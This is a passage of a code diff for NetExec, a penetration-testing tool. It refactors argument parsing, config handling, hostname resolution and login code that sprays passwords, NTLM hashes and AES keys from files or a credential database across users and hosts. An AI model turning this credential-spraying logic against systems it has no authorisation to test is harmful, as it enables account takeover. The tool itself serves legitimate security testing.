help="FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter",
|
|
||||||
)
|
|
||||||
|
|
||||||
fail_group = std_parser.add_mutually_exclusive_group()
|
fail_group = std_parser.add_mutually_exclusive_group()
|
||||||
fail_group.add_argument(
|
fail_group.add_argument("--gfail-limit", metavar="LIMIT", type=int, help="max number of global failed login attempts")
|
||||||
"--gfail-limit",
|
fail_group.add_argument("--ufail-limit", metavar="LIMIT", type=int, help="max number of failed login attempts per username")
|
||||||
metavar="LIMIT",
|
fail_group.add_argument("--fail-limit", metavar="LIMIT", type=int, help="max number of failed login attempts per host")
|
||||||
type=int,
|
|
||||||
help="max number of global failed login attempts",
|
|
||||||
)
|
|
||||||
fail_group.add_argument(
|
|
||||||
"--ufail-limit",
|
|
||||||
metavar="LIMIT",
|
|
||||||
type=int,
|
|
||||||
help="max number of failed login attempts per username",
|
|
||||||
)
|
|
||||||
fail_group.add_argument(
|
|
||||||
"--fail-limit",
|
|
||||||
metavar="LIMIT",
|
|
||||||
type=int,
|
|
||||||
help="max number of failed login attempts per host",
|
|
||||||
)
|
|
||||||
|
|
||||||
p_loader = ProtocolLoader()
|
p_loader = ProtocolLoader()
|
||||||
protocols = p_loader.get_protocols()
|
protocols = p_loader.get_protocols()
|
||||||
|
|
||||||
for protocol in protocols.keys():
|
try:
|
||||||
try:
|
for protocol in protocols:
|
||||||
protocol_object = p_loader.load_protocol(protocols[protocol]["argspath"])
|
protocol_object = p_loader.load_protocol(protocols[protocol]["argspath"])
|
||||||
subparsers = protocol_object.proto_args(subparsers, std_parser, module_parser)
|
subparsers = protocol_object.proto_args(subparsers, std_parser, module_parser)
|
||||||
except:
|
except Exception as e:
|
||||||
nxc_logger.exception(f"Error loading proto_args from proto_args.py file in protocol folder: {protocol}")
|
nxc_logger.exception(f"Error loading proto_args from proto_args.py file in protocol folder: {protocol} - {e}")
|
||||||
|
|
||||||
|
argcomplete.autocomplete(parser)
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
if len(sys.argv) == 1:
|
if len(sys.argv) == 1:
|
||||||
parser.print_help()
|
parser.print_help()
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
args = parser.parse_args()
|
|
||||||
|
|
||||||
if args.version:
|
if args.version:
|
||||||
print(f"{VERSION} - {CODENAME}")
|
print(f"{VERSION} - {CODENAME}")
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
return args
|
return args
|
||||||
|
|
||||||
|
|
||||||
|
def get_module_names():
|
||||||
|
"""Get module names without initializing them"""
|
||||||
|
modules = []
|
||||||
|
modules_paths = [
|
||||||
|
path_join(dirname(nxc.__file__), "modules"),
|
||||||
|
path_join(NXC_PATH, "modules"),
|
||||||
|
]
|
||||||
|
|
||||||
|
for path in modules_paths:
|
||||||
|
modules.extend([module[:-3] for module in listdir(path) if module[-3:] == ".py" and module != "example_module.py"])
|
||||||
|
return sorted(modules, key=str.casefold)
|
||||||
|
|
|
@ -1,8 +1,7 @@
|
||||||
# coding=utf-8
|
|
||||||
import os
|
import os
|
||||||
from os.path import join as path_join
|
from os.path import join as path_join
|
||||||
import configparser
|
import configparser
|
||||||
from nxc.paths import nxc_PATH, DATA_PATH
|
from nxc.paths import NXC_PATH, DATA_PATH
|
||||||
from nxc.first_run import first_run_setup
|
from nxc.first_run import first_run_setup
|
||||||
from nxc.logger import nxc_logger
|
from nxc.logger import nxc_logger
|
||||||
from ast import literal_eval
|
from ast import literal_eval
|
||||||
|
@ -11,11 +10,11 @@ nxc_default_config = configparser.ConfigParser()
|
||||||
nxc_default_config.read(path_join(DATA_PATH, "nxc.conf"))
|
nxc_default_config.read(path_join(DATA_PATH, "nxc.conf"))
|
||||||
|
|
||||||
nxc_config = configparser.ConfigParser()
|
nxc_config = configparser.ConfigParser()
|
||||||
nxc_config.read(os.path.join(nxc_PATH, "nxc.conf"))
|
nxc_config.read(os.path.join(NXC_PATH, "nxc.conf"))
|
||||||
|
|
||||||
if "nxc" not in nxc_config.sections():
|
if "nxc" not in nxc_config.sections():
|
||||||
first_run_setup()
|
first_run_setup()
|
||||||
nxc_config.read(os.path.join(nxc_PATH, "nxc.conf"))
|
nxc_config.read(os.path.join(NXC_PATH, "nxc.conf"))
|
||||||
|
|
||||||
# Check if there are any missing options in the config file
|
# Check if there are any missing options in the config file
|
||||||
for section in nxc_default_config.sections():
|
for section in nxc_default_config.sections():
|
||||||
|
@ -24,10 +23,10 @@ for section in nxc_default_config.sections():
|
||||||
nxc_logger.display(f"Adding missing option '{option}' in config section '{section}' to nxc.conf")
|
nxc_logger.display(f"Adding missing option '{option}' in config section '{section}' to nxc.conf")
|
||||||
nxc_config.set(section, option, nxc_default_config.get(section, option))
|
nxc_config.set(section, option, nxc_default_config.get(section, option))
|
||||||
|
|
||||||
with open(path_join(nxc_PATH, "nxc.conf"), "w") as config_file:
|
with open(path_join(NXC_PATH, "nxc.conf"), "w") as config_file:
|
||||||
nxc_config.write(config_file)
|
nxc_config.write(config_file)
|
||||||
|
|
||||||
#!!! THESE OPTIONS HAVE TO EXIST IN THE DEFAULT CONFIG FILE !!!
|
# THESE OPTIONS HAVE TO EXIST IN THE DEFAULT CONFIG FILE
|
||||||
nxc_workspace = nxc_config.get("nxc", "workspace", fallback="default")
|
nxc_workspace = nxc_config.get("nxc", "workspace", fallback="default")
|
||||||
pwned_label = nxc_config.get("nxc", "pwn3d_label", fallback="Pwn3d!")
|
pwned_label = nxc_config.get("nxc", "pwn3d_label", fallback="Pwn3d!")
|
||||||
audit_mode = nxc_config.get("nxc", "audit_mode", fallback=False)
|
audit_mode = nxc_config.get("nxc", "audit_mode", fallback=False)
|
||||||
|
@ -44,5 +43,5 @@ if len(host_info_colors) != 4:
|
||||||
|
|
||||||
# this should probably be put somewhere else, but if it's in the config helpers, there is a circular import
|
# this should probably be put somewhere else, but if it's in the config helpers, there is a circular import
|
||||||
def process_secret(text):
|
def process_secret(text):
|
||||||
hidden = text[:reveal_chars_of_pwd]
|
reveal = text[:reveal_chars_of_pwd]
|
||||||
return text if not audit_mode else hidden+audit_mode * 8
|
return text if not audit_mode else reveal + (audit_mode if len(audit_mode) > 1 else audit_mode * 8)
|
||||||
|
|
|
@ -1,22 +1,19 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import random
|
import random
|
||||||
import socket
|
|
||||||
from socket import AF_INET, AF_INET6, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME
|
|
||||||
from socket import getaddrinfo
|
|
||||||
from os.path import isfile
|
from os.path import isfile
|
||||||
from threading import BoundedSemaphore
|
from threading import BoundedSemaphore
|
||||||
from functools import wraps
|
from functools import wraps
|
||||||
from time import sleep
|
from time import sleep
|
||||||
from ipaddress import ip_address
|
from ipaddress import ip_address
|
||||||
|
from socket import AF_UNSPEC, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME, getaddrinfo
|
||||||
|
|
||||||
from nxc.config import pwned_label
|
from nxc.config import pwned_label
|
||||||
from nxc.helpers.logger import highlight
|
from nxc.helpers.logger import highlight
|
||||||
from nxc.logger import nxc_logger, NXCAdapter
|
from nxc.logger import nxc_logger, NXCAdapter
|
||||||
from nxc.context import Context
|
from nxc.context import Context
|
||||||
|
from nxc.protocols.ldap.laps import laps_search
|
||||||
|
|
||||||
from impacket.dcerpc.v5 import transport
|
from impacket.dcerpc.v5 import transport
|
||||||
|
import sys
|
||||||
|
|
||||||
sem = BoundedSemaphore(1)
|
sem = BoundedSemaphore(1)
|
||||||
global_failed_logins = 0
|
global_failed_logins = 0
|
||||||
|
@ -24,40 +21,49 @@ user_failed_logins = {}
|
||||||
|
|
||||||
|
|
||||||
def gethost_addrinfo(hostname):
|
def gethost_addrinfo(hostname):
|
||||||
try:
|
is_ipv6 = False
|
||||||
for res in getaddrinfo( hostname, None, AF_INET6, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME):
|
is_link_local_ipv6 = False
|
||||||
af, socktype, proto, canonname, sa = res
|
address_info = {"AF_INET6": "", "AF_INET": ""}
|
||||||
host = canonname if ip_address(sa[0]).is_link_local else sa[0]
|
|
||||||
except socket.gaierror:
|
for res in getaddrinfo(hostname, None, AF_UNSPEC, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME):
|
||||||
for res in getaddrinfo( hostname, None, AF_INET, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME):
|
af, _, _, canonname, sa = res
|
||||||
af, socktype, proto, canonname, sa = res
|
address_info[af.name] = sa[0]
|
||||||
host = sa[0] if sa[0] else canonname
|
|
||||||
return host
|
# IPv4 preferred
|
||||||
|
if address_info["AF_INET"]:
|
||||||
|
host = address_info["AF_INET"]
|
||||||
|
else:
|
||||||
|
is_ipv6 = True
|
||||||
|
host, is_link_local_ipv6 = (canonname, True) if ip_address(address_info["AF_INET6"]).is_link_local else (address_info["AF_INET6"], False)
|
||||||
|
|
||||||
|
return host, is_ipv6, is_link_local_ipv6
|
||||||
|
|
||||||
|
|
||||||
def requires_admin(func):
|
def requires_admin(func):
|
||||||
def _decorator(self, *args, **kwargs):
|
def _decorator(self, *args, **kwargs):
|
||||||
if self.admin_privs is False:
|
if self.admin_privs is False:
|
||||||
return
|
return None
|
||||||
return func(self, *args, **kwargs)
|
return func(self, *args, **kwargs)
|
||||||
|
|
||||||
return wraps(func)(_decorator)
|
return wraps(func)(_decorator)
|
||||||
|
|
||||||
|
|
||||||
def dcom_FirewallChecker(iInterface, timeout):
|
def dcom_FirewallChecker(iInterface, timeout):
|
||||||
stringBindings = iInterface.get_cinstance().get_string_bindings()
|
stringBindings = iInterface.get_cinstance().get_string_bindings()
|
||||||
for strBinding in stringBindings:
|
for strBinding in stringBindings:
|
||||||
if strBinding['wTowerId'] == 7:
|
if strBinding["wTowerId"] == 7:
|
||||||
if strBinding['aNetworkAddr'].find('[') >= 0:
|
if strBinding["aNetworkAddr"].find("[") >= 0:
|
||||||
binding, _, bindingPort = strBinding['aNetworkAddr'].partition('[')
|
binding, _, bindingPort = strBinding["aNetworkAddr"].partition("[")
|
||||||
bindingPort = '[' + bindingPort
|
bindingPort = "[" + bindingPort
|
||||||
else:
|
else:
|
||||||
binding = strBinding['aNetworkAddr']
|
binding = strBinding["aNetworkAddr"]
|
||||||
bindingPort = ''
|
bindingPort = ""
|
||||||
|
|
||||||
if binding.upper().find(iInterface.get_target().upper()) >= 0:
|
if binding.upper().find(iInterface.get_target().upper()) >= 0:
|
||||||
stringBinding = 'ncacn_ip_tcp:' + strBinding['aNetworkAddr'][:-1]
|
stringBinding = "ncacn_ip_tcp:" + strBinding["aNetworkAddr"][:-1]
|
||||||
break
|
break
|
||||||
elif iInterface.is_fqdn() and binding.upper().find(iInterface.get_target().upper().partition('.')[0]) >= 0:
|
elif iInterface.is_fqdn() and binding.upper().find(iInterface.get_target().upper().partition(".")[0]) >= 0:
|
||||||
stringBinding = 'ncacn_ip_tcp:%s%s' % (iInterface.get_target(), bindingPort)
|
stringBinding = f"ncacn_ip_tcp:{iInterface.get_target()}{bindingPort}"
|
||||||
if "stringBinding" not in locals():
|
if "stringBinding" not in locals():
|
||||||
return True, None
|
return True, None
|
||||||
try:
|
try:
|
||||||
|
@ -65,22 +71,25 @@ def dcom_FirewallChecker(iInterface, timeout):
|
||||||
rpctransport.set_connect_timeout(timeout)
|
rpctransport.set_connect_timeout(timeout)
|
||||||
rpctransport.connect()
|
rpctransport.connect()
|
||||||
rpctransport.disconnect()
|
rpctransport.disconnect()
|
||||||
except:
|
except Exception as e:
|
||||||
|
nxc_logger.debug(f"Exception while connecting to {stringBinding}: {e}")
|
||||||
return False, stringBinding
|
return False, stringBinding
|
||||||
else:
|
else:
|
||||||
return True, stringBinding
|
return True, stringBinding
|
||||||
|
|
||||||
class connection(object):
|
|
||||||
|
class connection:
|
||||||
def __init__(self, args, db, host):
|
def __init__(self, args, db, host):
|
||||||
self.domain = None
|
self.domain = None
|
||||||
self.args = args
|
self.args = args
|
||||||
self.db = db
|
self.db = db
|
||||||
self.hostname = host
|
self.hostname = host
|
||||||
|
self.port = self.args.port
|
||||||
self.conn = None
|
self.conn = None
|
||||||
self.admin_privs = False
|
self.admin_privs = False
|
||||||
self.password = ""
|
self.password = None
|
||||||
self.username = ""
|
self.username = None
|
||||||
self.kerberos = True if self.args.kerberos or self.args.use_kcache or self.args.aesKey else False
|
self.kerberos = bool(self.args.kerberos or self.args.use_kcache or self.args.aesKey)
|
||||||
self.aesKey = None if not self.args.aesKey else self.args.aesKey[0]
|
self.aesKey = None if not self.args.aesKey else self.args.aesKey[0]
|
||||||
self.kdcHost = None if not self.args.kdcHost else self.args.kdcHost
|
self.kdcHost = None if not self.args.kdcHost else self.args.kdcHost
|
||||||
self.use_kcache = None if not self.args.use_kcache else self.args.use_kcache
|
self.use_kcache = None if not self.args.use_kcache else self.args.use_kcache
|
||||||
|
@ -89,10 +98,10 @@ class connection(object):
|
||||||
self.logger = nxc_logger
|
self.logger = nxc_logger
|
||||||
|
|
||||||
try:
|
try:
|
||||||
self.host = gethost_addrinfo(self.hostname)
|
self.host, self.is_ipv6, self.is_link_local_ipv6 = gethost_addrinfo(self.hostname)
|
||||||
if self.args.kerberos:
|
if self.args.kerberos:
|
||||||
self.host = self.hostname
|
self.host = self.hostname
|
||||||
self.logger.info(f"Socket info: host={self.host}, hostname={self.hostname}, kerberos={ 'True' if self.args.kerberos else 'False' }")
|
self.logger.info(f"Socket info: host={self.host}, hostname={self.hostname}, kerberos={self.kerberos}, ipv6={self.is_ipv6}, link-local ipv6={self.is_link_local_ipv6}")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
self.logger.info(f"Error resolving hostname {self.hostname}: {e}")
|
self.logger.info(f"Error resolving hostname {self.hostname}: {e}")
|
||||||
return
|
return
|
||||||
|
@ -152,26 +161,46 @@ class connection(object):
|
||||||
return
|
return
|
||||||
|
|
||||||
def proto_flow(self):
|
def proto_flow(self):
|
||||||
self.logger.debug(f"Kicking off proto_flow")
|
self.logger.debug("Kicking off proto_flow")
|
||||||
self.proto_logger()
|
self.proto_logger()
|
||||||
if self.create_conn_obj():
|
if self.create_conn_obj():
|
||||||
|
self.logger.debug("Created connection object")
|
||||||
self.enum_host_info()
|
self.enum_host_info()
|
||||||
if self.print_host_info():
|
if self.print_host_info() and (self.login() or (self.username == "" and self.password == "")):
|
||||||
# because of null session
|
if hasattr(self.args, "module") and self.args.module:
|
||||||
if self.login() or (self.username == "" and self.password == ""):
|
self.logger.debug("Calling modules")
|
||||||
if hasattr(self.args, "module") and self.args.module:
|
self.call_modules()
|
||||||
self.call_modules()
|
else:
|
||||||
else:
|
self.logger.debug("Calling command arguments")
|
||||||
self.call_cmd_args()
|
self.call_cmd_args()
|
||||||
|
|
||||||
def call_cmd_args(self):
|
def call_cmd_args(self):
|
||||||
for k, v in vars(self.args).items():
|
"""Calls all the methods specified by the command line arguments
|
||||||
if hasattr(self, k) and hasattr(getattr(self, k), "__call__"):
|
|
||||||
if v is not False and v is not None:
|
Iterates over the attributes of an object (self.args)
|
||||||
self.logger.debug(f"Calling {k}()")
|
For each attribute, it checks if the object (self) has an attribute with the same name and if that attribute is callable (i.e., a function)
|
||||||
r = getattr(self, k)()
|
If both conditions are met and the attribute value is not False or None,
|
||||||
|
it calls the function and logs a debug message
|
||||||
|
|
||||||
|
Parameters
|
||||||
|
----------
|
||||||
|
self (object): The instance of the class.
|
||||||
|
|
||||||
|
Returns
|
||||||
|
-------
|
||||||
|
None
|
||||||
|
"""
|
||||||
|
for attr, value in vars(self.args).items():
|
||||||
|
if hasattr(self, attr) and callable(getattr(self, attr)) and value is not False and value is not None:
|
||||||
|
self.logger.debug(f"Calling {attr}()")
|
||||||
|
getattr(self, attr)()
|
||||||
|
|
||||||
def call_modules(self):
|
def call_modules(self):
|
||||||
|
"""Calls modules and performs various actions based on the module's attributes.
|
||||||
|
|
||||||
|
It iterates over the modules specified in the command line arguments.
|
||||||
|
For each module, it loads the module and creates a context object, then calls functions based on the module's attributes.
|
||||||
|
"""
|
||||||
for module in self.module:
|
for module in self.module:
|
||||||
self.logger.debug(f"Loading module {module.name} - {module}")
|
self.logger.debug(f"Loading module {module.name} - {module}")
|
||||||
module_logger = NXCAdapter(
|
module_logger = NXCAdapter(
|
||||||
|
@ -208,7 +237,7 @@ class connection(object):
|
||||||
global global_failed_logins
|
global global_failed_logins
|
||||||
global user_failed_logins
|
global user_failed_logins
|
||||||
|
|
||||||
if username not in user_failed_logins.keys():
|
if username not in user_failed_logins:
|
||||||
user_failed_logins[username] = 0
|
user_failed_logins[username] = 0
|
||||||
|
|
||||||
user_failed_logins[username] += 1
|
user_failed_logins[username] += 1
|
||||||
|
@ -225,53 +254,54 @@ class connection(object):
|
||||||
if self.failed_logins == self.args.fail_limit:
|
if self.failed_logins == self.args.fail_limit:
|
||||||
return True
|
return True
|
||||||
|
|
||||||
if username in user_failed_logins.keys():
|
if username in user_failed_logins and self.args.ufail_limit == user_failed_logins[username]:
|
||||||
if self.args.ufail_limit == user_failed_logins[username]:
|
return True
|
||||||
return True
|
|
||||||
|
|
||||||
return False
|
return False
|
||||||
|
|
||||||
def query_db_creds(self):
|
def query_db_creds(self):
|
||||||
"""
|
"""Queries the database for credentials to be used for authentication.
|
||||||
Queries the database for credentials to be used for authentication.
|
|
||||||
Valid cred_id values are:
|
Valid cred_id values are:
|
||||||
- a single cred_id
|
- a single cred_id
|
||||||
- a range specified with a dash (ex. 1-5)
|
- a range specified with a dash (ex. 1-5)
|
||||||
- 'all' to select all credentials
|
- 'all' to select all credentials
|
||||||
|
|
||||||
:return: domain[], username[], owned[], secret[], cred_type[]
|
:return: domains[], usernames[], owned[], secrets[], cred_types[]
|
||||||
"""
|
"""
|
||||||
domain = []
|
domains = []
|
||||||
username = []
|
usernames = []
|
||||||
owned = []
|
owned = []
|
||||||
secret = []
|
secrets = []
|
||||||
cred_type = []
|
cred_types = []
|
||||||
creds = [] # list of tuples (cred_id, domain, username, secret, cred_type, pillaged_from) coming from the database
|
creds = [] # list of tuples (cred_id, domain, username, secret, cred_type, pillaged_from) coming from the database
|
||||||
data = [] # Arbitrary data needed for the login, e.g. ssh_key
|
data = [] # Arbitrary data needed for the login, e.g. ssh_key
|
||||||
|
|
||||||
for cred_id in self.args.cred_id:
|
for cred_id in self.args.cred_id:
|
||||||
if isinstance(cred_id, str) and cred_id.lower() == 'all':
|
if cred_id.lower() == "all":
|
||||||
creds = self.db.get_credentials()
|
creds = self.db.get_credentials()
|
||||||
else:
|
else:
|
||||||
if not self.db.get_credentials(filter_term=int(cred_id)):
|
if not self.db.get_credentials(filter_term=int(cred_id)):
|
||||||
self.logger.error('Invalid database credential ID {}!'.format(cred_id))
|
self.logger.error(f"Invalid database credential ID {cred_id}!")
|
||||||
continue
|
continue
|
||||||
creds.extend(self.db.get_credentials(filter_term=int(cred_id)))
|
creds.extend(self.db.get_credentials(filter_term=int(cred_id)))
|
||||||
|
|
||||||
for cred in creds:
|
for cred in creds:
|
||||||
c_id, domain_single, username_single, secret_single, cred_type_single, pillaged_from = cred
|
c_id, domain, username, secret, cred_type, pillaged_from = cred
|
||||||
domain.append(domain_single)
|
domains.append(domain)
|
||||||
username.append(username_single)
|
usernames.append(username)
|
||||||
owned.append(False) # As these are likely valid we still want to test them if they are specified in the command line
|
owned.append(False) # As these are likely valid we still want to test them if they are specified in the command line
|
||||||
secret.append(secret_single)
|
secrets.append(secret)
|
||||||
cred_type.append(cred_type_single)
|
cred_types.append(cred_type)
|
||||||
|
|
||||||
if len(secret) != len(data): data = [None] * len(secret)
|
if len(secrets) != len(data):
|
||||||
return domain, username, owned, secret, cred_type, data
|
data = [None] * len(secrets)
|
||||||
|
|
||||||
|
return domains, usernames, owned, secrets, cred_types, data
|
||||||
|
|
||||||
def parse_credentials(self):
|
def parse_credentials(self):
|
||||||
"""
|
r"""Parse credentials from the command line or from a file specified.
|
||||||
Parse credentials from the command line or from a file specified.
|
|
||||||
Usernames can be specified with a domain (domain\\username) or without (username).
|
Usernames can be specified with a domain (domain\\username) or without (username).
|
||||||
If the file contains domain\\username the domain specified will be overwritten by the one in the file.
|
If the file contains domain\\username the domain specified will be overwritten by the one in the file.
|
||||||
|
|
||||||
|
@ -286,7 +316,7 @@ class connection(object):
|
||||||
# Parse usernames
|
# Parse usernames
|
||||||
for user in self.args.username:
|
for user in self.args.username:
|
||||||
if isfile(user):
|
if isfile(user):
|
||||||
with open(user, 'r') as user_file:
|
with open(user) as user_file:
|
||||||
for line in user_file:
|
for line in user_file:
|
||||||
if "\\" in line:
|
if "\\" in line:
|
||||||
domain_single, username_single = line.split("\\")
|
domain_single, username_single = line.split("\\")
|
||||||
|
@ -310,42 +340,41 @@ class connection(object):
|
||||||
for password in self.args.password:
|
for password in self.args.password:
|
||||||
if isfile(password):
|
if isfile(password):
|
||||||
try:
|
try:
|
||||||
with open(password, 'r', errors = ('ignore' if self.args.ignore_pw_decoding else 'strict')) as password_file:
|
with open(password, errors=("ignore" if self.args.ignore_pw_decoding else "strict")) as password_file:
|
||||||
for line in password_file:
|
for line in password_file:
|
||||||
secret.append(line.strip())
|
secret.append(line.strip())
|
||||||
cred_type.append('plaintext')
|
cred_type.append("plaintext")
|
||||||
except UnicodeDecodeError as e:
|
except UnicodeDecodeError as e:
|
||||||
self.logger.error(f"{type(e).__name__}: Could not decode password file. Make sure the file only contains UTF-8 characters.")
|
self.logger.error(f"{type(e).__name__}: Could not decode password file. Make sure the file only contains UTF-8 characters.")
|
||||||
self.logger.error("You can ignore non UTF-8 characters with the option '--ignore-pw-decoding'")
|
self.logger.error("You can ignore non UTF-8 characters with the option '--ignore-pw-decoding'")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
else:
|
else:
|
||||||
secret.append(password)
|
secret.append(password)
|
||||||
cred_type.append('plaintext')
|
cred_type.append("plaintext")
|
||||||
|
|
||||||
# Parse NTLM-hashes
|
# Parse NTLM-hashes
|
||||||
if hasattr(self.args, "hash") and self.args.hash:
|
if hasattr(self.args, "hash") and self.args.hash:
|
||||||
for ntlm_hash in self.args.hash:
|
for ntlm_hash in self.args.hash:
|
||||||
if isfile(ntlm_hash):
|
if isfile(ntlm_hash):
|
||||||
with open(ntlm_hash, 'r') as ntlm_hash_file:
|
with open(ntlm_hash) as ntlm_hash_file:
|
||||||
for line in ntlm_hash_file:
|
for line in ntlm_hash_file:
|
||||||
secret.append(line.strip())
|
secret.append(line.strip())
|
||||||
cred_type.append('hash')
|
cred_type.append("hash")
|
||||||
else:
|
else:
|
||||||
secret.append(ntlm_hash)
|
secret.append(ntlm_hash)
|
||||||
cred_type.append('hash')
|
cred_type.append("hash")
|
||||||
|
|
||||||
# Parse AES keys
|
# Parse AES keys
|
||||||
if self.args.aesKey:
|
if self.args.aesKey:
|
||||||
for aesKey in self.args.aesKey:
|
for aesKey in self.args.aesKey:
|
||||||
if isfile(aesKey):
|
if isfile(aesKey):
|
||||||
with open(aesKey, 'r') as aesKey_file:
|
with open(aesKey) as aesKey_file:
|
||||||
for line in aesKey_file:
|
for line in aesKey_file:
|
||||||
secret.append(line.strip())
|
secret.append(line.strip())
|
||||||
cred_type.append('aesKey')
|
cred_type.append("aesKey")
|
||||||
else:
|
else:
|
||||||
secret.append(aesKey)
|
secret.append(aesKey)
|
||||||
cred_type.append('aesKey')
|
cred_type.append("aesKey")
|
||||||
|
|
||||||
# Allow trying multiple users with a single password
|
# Allow trying multiple users with a single password
|
||||||
if len(username) > 1 and len(secret) == 1:
|
if len(username) > 1 and len(secret) == 1:
|
||||||
|
@ -356,8 +385,8 @@ class connection(object):
|
||||||
return domain, username, owned, secret, cred_type, [None] * len(secret)
|
return domain, username, owned, secret, cred_type, [None] * len(secret)
|
||||||
|
|
||||||
def try_credentials(self, domain, username, owned, secret, cred_type, data=None):
|
def try_credentials(self, domain, username, owned, secret, cred_type, data=None):
|
||||||
"""
|
"""Try to login using the specified credentials and protocol.
|
||||||
Try to login using the specified credentials and protocol.
|
|
||||||
Possible login methods are:
|
Possible login methods are:
|
||||||
- plaintext (/kerberos)
|
- plaintext (/kerberos)
|
||||||
- NTLM-hash (/kerberos)
|
- NTLM-hash (/kerberos)
|
||||||
|
@ -367,31 +396,31 @@ class connection(object):
|
||||||
return False
|
return False
|
||||||
if self.args.continue_on_success and owned:
|
if self.args.continue_on_success and owned:
|
||||||
return False
|
return False
|
||||||
# Enforcing FQDN for SMB if not using local authentication. Related issues/PRs: #26, #28, #24, #38
|
if hasattr(self.args, "delegate") and self.args.delegate:
|
||||||
if self.args.protocol == 'smb' and not self.args.local_auth and "." not in domain and not self.args.laps and secret != "" and not (self.domain.upper() == self.hostname.upper()) :
|
self.args.kerberos = True
|
||||||
self.logger.error(f"Domain {domain} for user {username.rstrip()} need to be FQDN ex:domain.local, not domain")
|
|
||||||
return False
|
|
||||||
|
|
||||||
with sem:
|
with sem:
|
||||||
if cred_type == 'plaintext':
|
if cred_type == "plaintext":
|
||||||
if self.args.kerberos:
|
if self.args.kerberos:
|
||||||
return self.kerberos_login(domain, username, secret, '', '', self.kdcHost, False)
|
self.logger.debug("Trying to authenticate using Kerberos")
|
||||||
elif hasattr(self.args, "domain"): # Some protocolls don't use domain for login
|
return self.kerberos_login(domain, username, secret, "", "", self.kdcHost, False)
|
||||||
|
elif hasattr(self.args, "domain"): # Some protocols don't use domain for login
|
||||||
|
self.logger.debug("Trying to authenticate using plaintext with domain")
|
||||||
return self.plaintext_login(domain, username, secret)
|
return self.plaintext_login(domain, username, secret)
|
||||||
elif self.args.protocol == 'ssh':
|
elif self.args.protocol == "ssh":
|
||||||
|
self.logger.debug("Trying to authenticate using plaintext over SSH")
|
||||||
return self.plaintext_login(username, secret, data)
|
return self.plaintext_login(username, secret, data)
|
||||||
else:
|
else:
|
||||||
|
self.logger.debug("Trying to authenticate using plaintext")
|
||||||
return self.plaintext_login(username, secret)
|
return self.plaintext_login(username, secret)
|
||||||
elif cred_type == 'hash':
|
elif cred_type == "hash":
|
||||||
if self.args.kerberos:
|
if self.args.kerberos:
|
||||||
return self.kerberos_login(domain, username, '', secret, '', self.kdcHost, False)
|
return self.kerberos_login(domain, username, "", secret, "", self.kdcHost, False)
|
||||||
return self.hash_login(domain, username, secret)
|
return self.hash_login(domain, username, secret)
|
||||||
elif cred_type == 'aesKey':
|
elif cred_type == "aesKey":
|
||||||
return self.kerberos_login(domain, username, '', '', secret, self.kdcHost, False)
|
return self.kerberos_login(domain, username, "", "", secret, self.kdcHost, False)
|
||||||
|
|
||||||
def login(self):
|
def login(self):
|
||||||
"""
|
"""Try to login using the credentials specified in the command line or in the database.
|
||||||
Try to login using the credentials specified in the command line or in the database.
|
|
||||||
|
|
||||||
:return: True if the login was successful and "--continue-on-success" was not specified, False otherwise.
|
:return: True if the login was successful and "--continue-on-success" was not specified, False otherwise.
|
||||||
"""
|
"""
|
||||||
|
@ -423,6 +452,7 @@ class connection(object):
|
||||||
data.extend(parsed_data)
|
data.extend(parsed_data)
|
||||||
|
|
||||||
if self.args.use_kcache:
|
if self.args.use_kcache:
|
||||||
|
self.logger.debug("Trying to authenticate using Kerberos cache")
|
||||||
with sem:
|
with sem:
|
||||||
username = self.args.username[0] if len(self.args.username) else ""
|
username = self.args.username[0] if len(self.args.username) else ""
|
||||||
password = self.args.password[0] if len(self.args.password) else ""
|
password = self.args.password[0] if len(self.args.password) else ""
|
||||||
|
@ -430,6 +460,13 @@ class connection(object):
|
||||||
self.logger.info("Successfully authenticated using Kerberos cache")
|
self.logger.info("Successfully authenticated using Kerberos cache")
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
if hasattr(self.args, "laps") and self.args.laps:
|
||||||
|
self.logger.debug("Trying to authenticate using LAPS")
|
||||||
|
username[0], secret[0], domain[0], ntlm_hash = laps_search(self, username, secret, cred_type, domain)
|
||||||
|
cred_type = ["plaintext"]
|
||||||
|
if not (username[0] or secret[0] or domain[0]):
|
||||||
|
return False
|
||||||
|
|
||||||
if not self.args.no_bruteforce:
|
if not self.args.no_bruteforce:
|
||||||
for secr_index, secr in enumerate(secret):
|
for secr_index, secr in enumerate(secret):
|
||||||
for user_index, user in enumerate(username):
|
for user_index, user in enumerate(username):
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import configparser
|
import configparser
|
||||||
import os
|
import os
|
||||||
|
|
||||||
|
@ -18,4 +15,3 @@ class Context:
|
||||||
self.conf.read(os.path.expanduser("~/.nxc/nxc.conf"))
|
self.conf.read(os.path.expanduser("~/.nxc/nxc.conf"))
|
||||||
|
|
||||||
self.log = logger
|
self.log = logger
|
||||||
# self.log.debug = logging.debug
|
|
||||||
|
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,97 @@
|
||||||
|
import sys
|
||||||
|
import configparser
|
||||||
|
import shutil
|
||||||
|
from sqlalchemy import create_engine
|
||||||
|
from sqlite3 import connect
|
||||||
|
from os import mkdir
|
||||||
|
from os.path import exists
|
||||||
|
from os.path import join as path_join
|
||||||
|
|
||||||
|
from nxc.loaders.protocolloader import ProtocolLoader
|
||||||
|
from nxc.paths import WORKSPACE_DIR
|
||||||
|
|
||||||
|
|
||||||
|
def create_db_engine(db_path):
|
||||||
|
return create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True)
|
||||||
|
|
||||||
|
|
||||||
|
def open_config(config_path):
|
||||||
|
try:
|
||||||
|
config = configparser.ConfigParser()
|
||||||
|
